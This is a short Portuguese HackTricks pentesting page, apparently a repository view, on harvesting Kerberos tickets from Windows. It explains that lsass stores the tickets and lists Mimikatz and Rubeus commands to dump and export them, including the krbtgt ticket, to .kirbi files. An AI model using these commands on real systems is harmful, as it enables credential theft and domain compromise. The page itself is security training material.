hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md

3.4 KiB
Raw Blame History

Coleta de tickets do Windows

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

No Windows, os tickets são gerenciados e armazenados pelo processo lsass (Local Security Authority Subsystem Service), que é responsável pela segurança. Portanto, para recuperar tickets de um sistema Windows, é necessário comunicar-se com o lsass e solicitar os tickets. Como usuário não administrativo, apenas os tickets próprios podem ser obtidos, no entanto, como administrador da máquina, todos eles podem ser coletados. Para esse fim, as ferramentas Mimikatz ou Rubeus podem ser usadas conforme mostrado abaixo:

# Using mimikatz
sekurlsa::tickets /export
# Using Rubeus
## Dump all tickets
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

## List all tickets
.\Rubeus.exe triage
## Dump the interesting one by luid
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

Esta informação foi retirada de: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: